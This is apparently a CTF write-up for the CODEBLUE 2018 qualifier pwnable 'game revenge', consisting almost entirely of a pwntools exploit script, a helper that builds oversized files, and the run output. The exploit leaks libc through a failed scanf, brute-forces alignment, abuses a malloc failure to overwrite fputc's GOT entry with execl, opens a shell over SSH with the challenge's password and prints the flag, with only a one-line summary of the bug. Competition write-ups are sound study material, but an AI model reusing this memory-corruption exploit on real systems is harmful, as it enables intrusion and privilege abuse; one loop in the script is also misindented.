CODEBLUE 2018 QUAL - game revenge (Exploit only)

Category : pwnable

Summary : big file, malloc fail, ptr=malloc(size+1);ptr[size] = '\x00';  // ptr = 0, size = 0x0804~~~~

정말 오랜만에 first blood + 1solve ! 설명은 조만간 추가 예정

ex.py

#!/usr/bin/python

from pwn import *
import re

ssh_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
ssh2_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
s2 = ssh2_.process('/bin/sh', env={'PS1':''})
s2.sendline('cd /tmp/wwwwpp/')
s2.sendline('''ln -s setregid_sh `python -c 'print "\xb0\x1d\x1b"'`''')


while 1:
   s = ssh_.process('/bin/sh', env={'PS1':''})
   s.sendline('cd /tmp/wwwwpp/')
   s.sendline('ulimit -c 1024')
   s.sendline('/home/p11454/game')

   # card game for memory leak
   s.recvuntil('3. Exit')
   s.sendline('2')

   # scanf("%u %u", ...) failed
   s.recvuntil('Input the coordinate of the 1st card to open\n')
   s.sendline('a b')

   s.recvuntil('Input the coordinate of the 2nd card to open\n')
   stack, libc_base = map(int, re.findall('\((\d+), (\d+)\)', s.recvline().strip())[0])
   #libc_base = libc_base - 0x1d0030
   libc_base = libc_base - 0x1d6010

   # last 2bytes of libc base must be 0xc000
   if (libc_base & 0xf000) != 0xc000:
      s.close()
      continue

   execl_libc = libc_base + 0xB0A80

   print 'libc_base :', hex(libc_base)
   print 'execl@libc : ', hex(execl_libc)
   s2.sendline('python create.py {}'.format(hex(execl_libc)))
   s2.recvuntil('done')

   # spray ...
   for i in range(0, 20):
      print i
      s.recvuntil('3. Exit\n')
      s.sendline('1')
      s.recvuntil('Can you answer all the questions correctly?')
      s.recvuntil('Q. ')
      s.sendline('a')
      s.recvuntil('Wrong.')

   s.recvuntil('3. Exit\n')
   s.sendline('1')
   s.recvuntil('Can you answer all the questions correctly?')
   for i in range(0, 5):
      print i
           s.recvuntil('Q. ')
           s.sendline('u\x00')
           s.recvuntil('Correct!')

   print 'trigger!'
   s.interactive()

create.py

#!/usr/bin/python

import sys
from struct import pack

p32 = lambda x : pack("<L", x)

if len(sys.argv) != 2:
   exit(-1)

def create_sample(fname, data, length):
   with open(fname, 'wb') as f:
      i = length % 0x1000 if length % 0x1000 else 0x1000
      f.write('a\nu\x00'+(data*((i-4)/len(data))))
      while i < length:
         f.write((data * (0x1000 / len(data))))
         i += 0x1000

create_sample('youlose', 'a', 0x8000000)
create_sample('banner', 'a', 0x0804b069)   # fputc@got
with open('flag', 'wb') as f:
   f.write('hello\nbye\n')

value = int(sys.argv[1], 16)
for i in range(1, 11):
   create_sample('quiz%02d' % i, p32(value), 0x8000000)

print 'done'

Exploit!

$ python ex.py
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[!] Couldn't check security settings on 'pwn2.task.ctf.codeblue.jp'
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16527
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16533
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16533)
..........................
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16672
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16672)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16677
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16677)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16682
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16682)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16687
libc_base : 0xf75fc000
execl@libc :  0xf76aca80
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0
1
2
3
4
trigger!
[*] Switching to interactive mode


(null)Q. hello
> $
Wrong.
$ id
uid=33433(game_chal) gid=11454(p11454) groups=11454(p11454),33433(game_chal)
$ cat /home/p11454/actual_flag
CBCTF{Natural vulnerability in a miniature garden}

Flag : CBCTF{Natural vulnerability in a miniature garden}